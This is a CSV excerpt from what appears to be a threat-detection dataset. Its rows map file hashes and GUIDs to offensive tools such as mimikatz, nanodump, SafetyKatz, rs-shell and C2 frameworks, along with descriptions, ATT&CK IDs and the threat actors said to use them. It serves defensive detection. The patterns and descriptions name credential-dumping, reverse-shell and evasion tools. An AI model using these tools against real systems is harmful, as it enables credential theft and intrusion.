"*82dcce571a813e9a942b3a6f0c8eb8d557fa29ce50c9ea5516526a62671fc153*",".{0,1000}82dcce571a813e9a942b3a6f0c8eb8d557fa29ce50c9ea5516526a62671fc153.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30080"
"*82e7270fab0c067f74ca4c8c8d0228ad49cb16149ea036ff6ec4a4fa62088c76*",".{0,1000}82e7270fab0c067f74ca4c8c8d0228ad49cb16149ea036ff6ec4a4fa62088c76.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30082"
"*82e7270fab0c067f74ca4c8c8d0228ad49cb16149ea036ff6ec4a4fa62088c76*",".{0,1000}82e7270fab0c067f74ca4c8c8d0228ad49cb16149ea036ff6ec4a4fa62088c76.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30083"
"*82ee96364fb2e2a1b96550fb3aff0e104b32eaaf1728c84a4a02a9a60b8cdb54*",".{0,1000}82ee96364fb2e2a1b96550fb3aff0e104b32eaaf1728c84a4a02a9a60b8cdb54.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","30087"
"*82f1a23dfcbcf483940976e8cc71e3e3ebd71df0b37a66319973e2ed178e597b*",".{0,1000}82f1a23dfcbcf483940976e8cc71e3e3ebd71df0b37a66319973e2ed178e597b.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30088"
"*82F417BE-49BF-44FF-9BBD-64FECEA181D7*",".{0,1000}82F417BE\-49BF\-44FF\-9BBD\-64FECEA181D7.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","#GUIDproject","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","30089"
"*82f53311c29da5884441a1dc621dc7087dc1b0e343ec160ed26c0fff4eadfe1f*",".{0,1000}82f53311c29da5884441a1dc621dc7087dc1b0e343ec160ed26c0fff4eadfe1f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30090"
"*830023999e063bef7fd09709d0aa3e34eb0cce2dacd382f381350e8890b20dee*",".{0,1000}830023999e063bef7fd09709d0aa3e34eb0cce2dacd382f381350e8890b20dee.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","30093"
"*83027372a543334309f8f262ede34349db3a09ff2ac4ab143c465a27c274d90a*",".{0,1000}83027372a543334309f8f262ede34349db3a09ff2ac4ab143c465a27c274d90a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30094"
"*83035080-7788-4EA3-82EE-6C06D2E6891F*",".{0,1000}83035080\-7788\-4EA3\-82EE\-6C06D2E6891F.{0,1000}","offensive_tool_keyword","HeapCrypt","Encypting the Heap while sleeping by hooking and modifying Sleep with our own sleep that encrypts the heap","T1055.001 - T1027 - T1146","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/HeapCrypt","1","0","#GUIDproject","N/A","9","3","239","44","2023-08-02T02:24:42Z","2023-03-25T05:19:52Z","30095"
"*83049a99591f84b7f50db732ccc8412b4e9b6e3bb188c00790880342d1e94cf0*",".{0,1000}83049a99591f84b7f50db732ccc8412b4e9b6e3bb188c00790880342d1e94cf0.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","30096"
"*8304a65e6096bcf63f30592b8049d47883c3c755600796c60a36c4c492f7af37*",".{0,1000}8304a65e6096bcf63f30592b8049d47883c3c755600796c60a36c4c492f7af37.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","30097"
"*830b926cbf6925eb0af2d99551ffe92613ce3da9b5a52292959df6c41ba93cd5*",".{0,1000}830b926cbf6925eb0af2d99551ffe92613ce3da9b5a52292959df6c41ba93cd5.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30098"
"*830df06f247546d342e1eb6cf13d214ea05a7bc89806c844cfe46efcb1227420*",".{0,1000}830df06f247546d342e1eb6cf13d214ea05a7bc89806c844cfe46efcb1227420.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30100"
"*8310f53135ddcc2e6b9fd6ca2aca3662f61dc1b5fb2b2510fa762e5862afcf94*",".{0,1000}8310f53135ddcc2e6b9fd6ca2aca3662f61dc1b5fb2b2510fa762e5862afcf94.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","#filehash","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","30102"
"*831d70eff6225d3ca5ed5723f7d17c5b7f7f7aaad583e6b0a7d8dd99cdcde755*",".{0,1000}831d70eff6225d3ca5ed5723f7d17c5b7f7f7aaad583e6b0a7d8dd99cdcde755.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","30105"
"*831d87d48fde985447d82a0dbde6a720ecb4c882e28af0bde713b6b340e5b8e3*",".{0,1000}831d87d48fde985447d82a0dbde6a720ecb4c882e28af0bde713b6b340e5b8e3.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","30106"
"*8337460fcc31ae6781de16482287810dcefc051e15cd18a28af46654b3ab7b4b*",".{0,1000}8337460fcc31ae6781de16482287810dcefc051e15cd18a28af46654b3ab7b4b.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","30110"
"*833d68452ea956b5d23bcb243cd327bd05dfd79fb5a4a34064783749eafa1ddf*",".{0,1000}833d68452ea956b5d23bcb243cd327bd05dfd79fb5a4a34064783749eafa1ddf.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","#filehash","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","30111"
"*8340cdf3b69ba92b47803f75eabb102d35454ef9676702ff1742c7136d9608de*",".{0,1000}8340cdf3b69ba92b47803f75eabb102d35454ef9676702ff1742c7136d9608de.{0,1000}","offensive_tool_keyword","keylogger","Keyboard recording","T1056.001","TA0006 - TA0009","N/A","N/A","Collection","https://github.com/uknowsec/keylogger","1","0","N/A","N/A","9","2","140","35","2021-05-19T08:33:58Z","2020-11-10T07:15:50Z","30112"
"*8347E81B-89FC-42A9-B22C-F59A6A572DEC*",".{0,1000}8347E81B\-89FC\-42A9\-B22C\-F59A6A572DEC.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","0","#GUIDproject","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","30114"
"*8347E81B-89FC-42A9-B22C-F59A6A572DEC*",".{0,1000}8347E81B\-89FC\-42A9\-B22C\-F59A6A572DEC.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","0","#GUIDproject","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","30115"
"*8347E81B-89FC-42A9-B22C-F59A6A572DEC*",".{0,1000}8347E81B\-89FC\-42A9\-B22C\-F59A6A572DEC.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","30116"
"*83536b1df51e5954c757179b70419fe5567df58f3ed029998e6ca82f7c0a15a7*",".{0,1000}83536b1df51e5954c757179b70419fe5567df58f3ed029998e6ca82f7c0a15a7.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","30117"
"*835544862f1683ef3996a1b9653a0daf1937d2cdd973004e4fa5003fef54a893*",".{0,1000}835544862f1683ef3996a1b9653a0daf1937d2cdd973004e4fa5003fef54a893.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","30118"
"*835747f27a37aa3fab9a116d7480701b813c16eba6b903eb82b96fa230aa992e*",".{0,1000}835747f27a37aa3fab9a116d7480701b813c16eba6b903eb82b96fa230aa992e.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","#filehash","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","30120"
"*835747f27a37aa3fab9a116d7480701b813c16eba6b903eb82b96fa230aa992e*",".{0,1000}835747f27a37aa3fab9a116d7480701b813c16eba6b903eb82b96fa230aa992e.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","#filehash","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","30121"
"*835b7b956f39cff5bb6e31a4fb06ba65615ae809e249b8161126e750b9fe1aae*",".{0,1000}835b7b956f39cff5bb6e31a4fb06ba65615ae809e249b8161126e750b9fe1aae.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#filehash","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","30122"
"*8361ec775f42fc269a4ff4ae37da23bad4988de8846db0160bad66d39d9b1365*",".{0,1000}8361ec775f42fc269a4ff4ae37da23bad4988de8846db0160bad66d39d9b1365.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","30123"
"*836385a2fd220d28afd32c8953ef06ae1e13ca36fadfdef901bcd8796e482f98*",".{0,1000}836385a2fd220d28afd32c8953ef06ae1e13ca36fadfdef901bcd8796e482f98.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30124"
"*836d7d2ecfbe96f0be128c9b1a4cdbb8e138c502c2420e91713c8b2621aa474a*",".{0,1000}836d7d2ecfbe96f0be128c9b1a4cdbb8e138c502c2420e91713c8b2621aa474a.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","#filehash","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","30126"
"*837f6333561b575fc379d692f6f197a375feabb6c942170e262d36ef21709325*",".{0,1000}837f6333561b575fc379d692f6f197a375feabb6c942170e262d36ef21709325.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#filehash","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","30127"
"*83803142d36f4e09346394ae2038353977bd16389fd80e09dc7fc1e8850e1365*",".{0,1000}83803142d36f4e09346394ae2038353977bd16389fd80e09dc7fc1e8850e1365.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","#filehash","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","30128"
"*83839ceecfba791129d3abd17623fa92d1aafac6d2e9078f5a2e842e5f599434*",".{0,1000}83839ceecfba791129d3abd17623fa92d1aafac6d2e9078f5a2e842e5f599434.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30129"
"*838e54cb93d57048d17204c85448b8ebcd4d1403cc3d8768ac02e702a64a6b28*",".{0,1000}838e54cb93d57048d17204c85448b8ebcd4d1403cc3d8768ac02e702a64a6b28.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","30130"
"*8392f4e2c944fbecade552f3bceefc426d47340a04535845ccc0f769801b28d6*",".{0,1000}8392f4e2c944fbecade552f3bceefc426d47340a04535845ccc0f769801b28d6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30131"
"*83aa5d2000790bd20d5c57f338668fb576e76149c0683b067a62d151bc2838dd*",".{0,1000}83aa5d2000790bd20d5c57f338668fb576e76149c0683b067a62d151bc2838dd.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30133"
"*83aeb8fb30e7d65ffdf35d2786efc4b89957f2462a39e09a18a1194a437436c4*",".{0,1000}83aeb8fb30e7d65ffdf35d2786efc4b89957f2462a39e09a18a1194a437436c4.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","30134"
"*83af4437fd36d6c244dbf04d1318195103d981ca4d2f2db99e6593ed74c00ec3*",".{0,1000}83af4437fd36d6c244dbf04d1318195103d981ca4d2f2db99e6593ed74c00ec3.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","30135"
"*83b1ddfa24d6f81fcae9fe687185dab70e97957b471a32e69d88d9b0acfb9d7a*",".{0,1000}83b1ddfa24d6f81fcae9fe687185dab70e97957b471a32e69d88d9b0acfb9d7a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30136"
"*83b3b581686f3920fed7238e4d5ccaaf47226447a8894189fc3cd4e5a99a5d96*",".{0,1000}83b3b581686f3920fed7238e4d5ccaaf47226447a8894189fc3cd4e5a99a5d96.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","30137"
"*83b65d33d21b01395de5b5537e36f18eb8f16237a64f3a8f17991dc652d1a61a*",".{0,1000}83b65d33d21b01395de5b5537e36f18eb8f16237a64f3a8f17991dc652d1a61a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30138"
"*83b65d33d21b01395de5b5537e36f18eb8f16237a64f3a8f17991dc652d1a61a*",".{0,1000}83b65d33d21b01395de5b5537e36f18eb8f16237a64f3a8f17991dc652d1a61a.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","#filehash","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","30139"
"*83b65d33d21b01395de5b5537e36f18eb8f16237a64f3a8f17991dc652d1a61a*",".{0,1000}83b65d33d21b01395de5b5537e36f18eb8f16237a64f3a8f17991dc652d1a61a.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","#filehash","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","30140"
"*83cc5974bd89d073642b0c07af35cd89db85a1f3b3cf1e49047592076e94c913*",".{0,1000}83cc5974bd89d073642b0c07af35cd89db85a1f3b3cf1e49047592076e94c913.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30143"
